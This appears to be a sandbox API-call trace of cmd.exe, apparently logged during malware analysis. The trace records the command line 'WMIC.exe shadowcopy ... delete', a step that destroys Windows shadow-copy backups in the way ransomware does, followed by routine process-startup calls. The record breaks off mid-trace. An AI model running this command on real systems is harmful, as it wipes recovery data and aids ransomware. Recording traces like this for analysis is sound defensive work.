[0096.903] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2ef730, dwLength=0x30 | out: lpBuffer=0x2ef730*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0096.903] VirtualQuery (in: lpAddress=0x1f4000, lpBuffer=0x2ef730, dwLength=0x30 | out: lpBuffer=0x2ef730*(BaseAddress=0x1f4000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0096.903] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2ef730, dwLength=0x30 | out: lpBuffer=0x2ef730*(BaseAddress=0x2f0000, AllocationBase=0x2f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0096.903] GetConsoleOutputCP () returned 0x1b5 [0096.903] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fcbfe0 | out: lpCPInfo=0x49fcbfe0) returned 1 [0096.903] SetConsoleCtrlHandler (HandlerRoutine=0x49fb3184, Add=1) returned 1 [0096.903] _get_osfhandle (_FileHandle=1) returned 0x7 [0096.903] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0096.904] _get_osfhandle (_FileHandle=1) returned 0x7 [0096.904] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fbe194 | out: lpMode=0x49fbe194) returned 1 [0096.904] _get_osfhandle (_FileHandle=1) returned 0x7 [0096.904] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0096.904] _get_osfhandle (_FileHandle=0) returned 0x3 [0096.904] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fbe198 | out: lpMode=0x49fbe198) returned 1 [0096.904] _get_osfhandle (_FileHandle=0) returned 0x3 [0096.904] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0096.904] GetEnvironmentStringsW () returned 0xf8b90* [0096.904] GetProcessHeap () returned 0xe0000 [0096.904] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xa7c) returned 0xf9620 [0096.905] FreeEnvironmentStringsW (penv=0xf8b90) returned 1 [0096.905] GetProcessHeap () returned 0xe0000 [0096.905] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf8a10 [0096.905] GetEnvironmentStringsW () returned 0xf8b90* [0096.905] GetProcessHeap () returned 0xe0000 [0096.905] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xa7c) returned 0xfa0b0 [0096.905] FreeEnvironmentStringsW (penv=0xf8b90) returned 1 [0096.905] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee688 | out: phkResult=0x2ee688*=0x44) returned 0x0 [0096.905] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee680, lpData=0x2ee6a0, lpcbData=0x2ee684*=0x1000 | out: lpType=0x2ee680*=0x0, lpData=0x2ee6a0*=0x18, lpcbData=0x2ee684*=0x1000) returned 0x2 [0096.905] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee680, lpData=0x2ee6a0, lpcbData=0x2ee684*=0x1000 | out: lpType=0x2ee680*=0x4, lpData=0x2ee6a0*=0x1, lpcbData=0x2ee684*=0x4) returned 0x0 [0096.905] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee680, lpData=0x2ee6a0, lpcbData=0x2ee684*=0x1000 | out: lpType=0x2ee680*=0x0, lpData=0x2ee6a0*=0x1, lpcbData=0x2ee684*=0x1000) returned 0x2 [0096.905] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee680, lpData=0x2ee6a0, lpcbData=0x2ee684*=0x1000 | out: lpType=0x2ee680*=0x4, lpData=0x2ee6a0*=0x0, lpcbData=0x2ee684*=0x4) returned 0x0 [0096.905] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee680, lpData=0x2ee6a0, lpcbData=0x2ee684*=0x1000 | out: lpType=0x2ee680*=0x4, lpData=0x2ee6a0*=0x40, lpcbData=0x2ee684*=0x4) returned 0x0 [0096.905] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee680, lpData=0x2ee6a0, lpcbData=0x2ee684*=0x1000 | out: lpType=0x2ee680*=0x4, lpData=0x2ee6a0*=0x40, lpcbData=0x2ee684*=0x4) returned 0x0 [0096.905] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee680, lpData=0x2ee6a0, lpcbData=0x2ee684*=0x1000 | out: lpType=0x2ee680*=0x0, lpData=0x2ee6a0*=0x40, lpcbData=0x2ee684*=0x1000) returned 0x2 [0096.905] RegCloseKey (hKey=0x44) returned 0x0 [0096.905] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee688 | out: phkResult=0x2ee688*=0x44) returned 0x0 [0096.905] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee680, lpData=0x2ee6a0, lpcbData=0x2ee684*=0x1000 | out: lpType=0x2ee680*=0x0, lpData=0x2ee6a0*=0x40, lpcbData=0x2ee684*=0x1000) returned 0x2 [0096.906] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee680, lpData=0x2ee6a0, lpcbData=0x2ee684*=0x1000 | out: lpType=0x2ee680*=0x4, lpData=0x2ee6a0*=0x1, lpcbData=0x2ee684*=0x4) returned 0x0 [0096.906] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee680, lpData=0x2ee6a0, lpcbData=0x2ee684*=0x1000 | out: lpType=0x2ee680*=0x0, lpData=0x2ee6a0*=0x1, lpcbData=0x2ee684*=0x1000) returned 0x2 [0096.906] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee680, lpData=0x2ee6a0, lpcbData=0x2ee684*=0x1000 | out: lpType=0x2ee680*=0x4, lpData=0x2ee6a0*=0x0, lpcbData=0x2ee684*=0x4) returned 0x0 [0096.906] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee680, lpData=0x2ee6a0, lpcbData=0x2ee684*=0x1000 | out: lpType=0x2ee680*=0x4, lpData=0x2ee6a0*=0x9, lpcbData=0x2ee684*=0x4) returned 0x0 [0096.906] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee680, lpData=0x2ee6a0, lpcbData=0x2ee684*=0x1000 | out: lpType=0x2ee680*=0x4, lpData=0x2ee6a0*=0x9, lpcbData=0x2ee684*=0x4) returned 0x0 [0096.906] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee680, lpData=0x2ee6a0, lpcbData=0x2ee684*=0x1000 | out: lpType=0x2ee680*=0x0, lpData=0x2ee6a0*=0x9, lpcbData=0x2ee684*=0x1000) returned 0x2 [0096.906] RegCloseKey (hKey=0x44) returned 0x0 [0096.906] time (in: timer=0x0 | out: timer=0x0) returned 0x5f517445 [0096.906] srand (_Seed=0x5f517445) [0096.906] GetCommandLineW () returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}'\" delete" [0096.906] GetCommandLineW () returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{E1ADED26-A00D-489F-A2D1-21A5F0FDF97C}'\" delete" [0096.906] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fcc0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0096.906] GetProcessHeap () returned 0xe0000 [0096.906] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x218) returned 0xfab40 [0096.906] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xfab50, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0096.906] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49fbf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0096.906] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49fbf360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0096.907] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49fbf360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0096.907] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0096.907] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0096.907] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0096.907] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0096.907] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0096.907] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0096.907] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0096.907] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0096.907] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0096.907] GetProcessHeap () returned 0xe0000 [0096.907] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf9620 | out: hHeap=0xe0000) returned 1 [0096.907] GetEnvironmentStringsW () returned 0xf8b90* [0096.907] GetProcessHeap () returned 0xe0000 [0096.907] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xa94) returned 0xfad60 [0096.907] FreeEnvironmentStringsW (penv=0xf8b90) returned 1 [0096.907] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49fbf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0096.907] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49fbf360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0096.907] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0096.907] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0096.907] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0096.907] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0096.907] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0096.907] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0096.907] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0096.907] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0096.908] GetProcessHeap () returned 0xe0000 [0096.908] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x5c) returned 0xfb800 [0096.908] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ef490 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0096.908] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x2ef490, lpFilePart=0x2ef470 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2ef470*="Desktop") returned 0x25 [0096.908] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0096.908] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef1a0 | out: lpFindFileData=0x2ef1a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0xfb870 [0096.908] FindClose (in: hFindFile=0xfb870 | out: hFindFile=0xfb870) returned 1 [0096.908] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x2ef1a0 | out: lpFindFileData=0x2ef1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0xfb870 [0096.908] FindClose (in: hFindFile=0xfb870 | out: hFindFile=0xfb870) returned 1 [0096.908] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0096.908] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x2ef1a0 | out: lpFindFileData=0x2ef1a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2516f480, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x2516f480, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Desktop", cAlternateFileName="")) returned 0xfb870 [0096.908] FindClose (in: hFindFile=0xfb870 | out: hFindFile=0xfb870) returned 1 [0096.908] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0096.908] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0096.908] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0096.909] GetProcessHeap () returned 0xe0000 [0096.909] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xfad60 | out: hHeap=0xe0000) returned 1 [0096.909] GetEnvironmentStringsW () returned 0xfb870* [0096.909] GetProcessHeap () returned 0xe0000 [0096.909] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xae8) returned 0xfc360 [0096.909] FreeEnvironmentStringsW (penv=0xfb870) returned 1 [0096.909] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49fcc0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0096.909] GetProcessHeap () returned 0xe0000 [0096.909] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xfb800 | out: hHeap=0xe0000) returned 1 [0096.909] GetProcessHeap () returned 0xe0000 [0096.909] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x4016) returned 0xfce50 [0096.909] GetProcessHeap () returned 0xe0000 [0096.909] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xe4) returned 0xf9680 [0096.909] GetProcessHeap () returned 0xe0000 [0096.909] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xfce50 | out: hHeap=0xe0000) returned 1 [0096.909] GetConsoleOutputCP () returned 0x1b5 [0096.910] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fcbfe0 | out: lpCPInfo=0x49fcbfe0) returned 1 [0096.910] GetUserDefaultLCID () returned 0x409 [0096.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49fc7b50, cchData=8 | out: lpLCData=":") returned 2 [0096.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2ef5a0, cchData=128 | out: lpLCData="0") returned 2 [0096.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2ef5a0, cchData=128 | out: lpLCData="0") returned 2 [0096.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2ef5a0, cchData=128 | out: lpLCData="1") returned 2 [0096.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49fda740, cchData=8 | out: lpLCData="/") returned 2 [0096.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49fda4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0096.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49fda460, cchData=32 | out: lpLCData="Tue") returned 4 [0096.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49fda420, cchData=32 | out: lpLCData="Wed") returned 4 [0096.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49fda3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0096.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49fda3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0096.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49fda360, cchData=32 | out: lpLCData="Sat") returned 4 [0096.910] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49fda700, cchData=32 | out: lpLCData="Sun") returned 4 [0096.910] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49fc7b40, cchData=8 | out: lpLCData=".") returned 2 [0096.911] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49fda4e0, cchData=8 | out: lpLCData=",") returned 2 [0096.911] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0096.911] GetProcessHeap () returned 0xe0000 [0096.911] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x20c) returned 0xf97e0 [0096.911] GetConsoleTitleW (in: lpConsoleTitle=0xf97e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0096.911] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0096.911] GetProcAddress (hModule=0x77940000, lpProcName="CopyFileExW") returned 0x779523d0 [0096.911] GetProcAddress (hModule=0x77940000, lpProcName="IsDebuggerPresent") returned 0x77948290 [0096.911] GetProcAddress (hModule=0x77940000, lpProcName="SetConsoleInputExeNameW") returned 0x779517e0 [0096.912] GetProcessHeap () returned 0xe0000 [0096.912] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x4012) returned 0xfce50 [0096.912] GetProcessHeap () returned 0xe0000 [0096.912] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xfce50 | out: hHeap=0xe0000) returned 1 [0096.914] _wcsicmp (_String1="C:\\Windows\\System32\\wbem\\WMIC.exe", _String2=")") returned 58 [0096.914] _wcsicmp (_String1="FOR", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 3 [0096.914] _wcsicmp (_String1="FOR/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 3 [0096.914] _wcsicmp (_String1="IF", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 6 [0096.914] _wcsicmp (_String1="IF/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 6 [0096.914] _wcsicmp (_String1="REM", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 15 [0096.914] _wcsicmp (_String1="REM/?", _String2="C:\\Windows\\System32\\wbem\\WMIC.exe") returned 15 [0096.914] GetProcessHeap () returned 0xe0000 [0096.914] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xb0) returned 0xf9a00 [0096.914] GetProcessHeap () returned 0xe0000 [0096.914] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x54) returned 0xf9ac0 [0096.916] GetProcessHeap () returned 0xe0000 [0096.916] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x9e) returned 0xf9b20 [0096.917] GetConsoleTitleW (in: lpConsoleTitle=0x2ef4b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0096.917] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0096.917] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0096.917] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2ef040, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2ef020, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2ef020*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0096.917] GetProcessHeap () returned 0xe0000 [0096.917] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x218) returned 0xf9bd0 [0096.917] GetProcessHeap () returned 0xe0000 [0096.917] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xe2) returned 0xf9df0 [0096.917] _wcsnicmp (_String1="C:\\W", _String2="cmd ", _MaxCount=0x4) returned -51 [0096.917] GetProcessHeap () returned 0xe0000 [0096.917] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x420) returned 0xe1320 [0096.918] SetErrorMode (uMode=0x0) returned 0x8001 [0096.918] SetErrorMode (uMode=0x1) returned 0x0 [0096.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\wbem\\.", nBufferLength=0x208, lpBuffer=0xe1330, lpFilePart=0x2eed40 | out: lpBuffer="C:\\Windows\\System32\\wbem", lpFilePart=0x2eed40*="wbem") returned 0x18 [0096.918] SetErrorMode (uMode=0x8001) returned 0x1 [0096.918] GetProcessHeap () returned 0xe0000 [0096.918] RtlReAllocateHeap (Heap=0xe0000, Flags=0x0, Ptr=0xe1320, Size=0x54) returned 0xe1320 [0096.918] GetProcessHeap () returned 0xe0000 [0096.918] RtlSizeHeap (HeapHandle=0xe0000, Flags=0x0, MemoryPointer=0xe1320) returned 0x54 [0096.918] NeedCurrentDirectoryForExePathW (ExeName="C:\\Windows\\System32\\wbem\\.") returned 1 [0096.918] GetProcessHeap () returned 0xe0000 [0096.918] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x48) returned 0xf9ee0 [0096.918] GetProcessHeap () returned 0xe0000 [0096.918] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x7c) returned 0xf9f30 [0096.918] GetProcessHeap () returned 0xe0000 [0096.918] RtlReAllocateHeap (Heap=0xe0000, Flags=0x0, Ptr=0xf9f30, Size=0x48) returned 0xf9f30 [0096.918] GetProcessHeap () returned 0xe0000 [0096.918] RtlSizeHeap (HeapHandle=0xe0000, Flags=0x0, MemoryPointer=0xf9f30) returned 0x48 [0096.918] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49fbf360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0096.918] GetProcessHeap () returned 0xe0000 [0096.918] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xe8) returned 0xf9f90 [0096.921] GetProcessHeap () returned 0xe0000 [0096.921] RtlReAllocateHeap (Heap=0xe0000, Flags=0x0, Ptr=0xf9f90, Size=0x7e) returned 0xf9f90 [0096.922] GetProcessHeap () returned 0xe0000 [0096.922] RtlSizeHeap (HeapHandle=0xe0000, Flags=0x0, MemoryPointer=0xf9f90) returned 0x7e [0096.922] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0096.922] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\wbem\\WMIC.exe", fInfoLevelId=0x1, lpFindFileData=0x2eeab0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eeab0) returned 0xfa020 [0096.923] GetProcessHeap () returned 0xe0000 [0096.923] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x28) returned 0xf46c0 [0096.923] FindClose (in: hFindFile=0xfa020 | out: hFindFile=0xfa020) returned 1 [0096.923] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0096.923] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0096.923] GetConsoleTitleW (in: lpConsoleTitle=0x2ef000, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0096.923] InitializeProcThreadAttributeList (in: lpAttributeList=0x2eedb8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2eed78 | out: lpAttributeList=0x2eedb8, lpSize=0x2eed78) returned 1 [0096.923] UpdateProcThreadAttribute (in: lpAttributeList=0x2eedb8, dwFlags=0x0, Attribute=0x60001, lpValue=0x2eed68, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2eedb8, lpPreviousValue=0x0) returned 1 [0096.923] GetStartupInfoW (in: lpStartupInfo=0x2eeed0 | out: lpStartupInfo=0x2eeed0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0096.923] GetProcessHeap () returned 0xe0000 [0096.923] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x20) returned 0xf46f0 [0096.923] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0096.923] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0096.923] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0096.923] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0096.923] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0096.923] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0096.923] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0096.923] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0096.923] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0096.923] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0096.923] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0096.923] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0096.923] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0096.923] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0096.923] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0096.924] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0096.924] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0096.924] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0096.924] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0096.924] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0096.924] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0096.924] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0096.924] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0096.924] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0096.924] 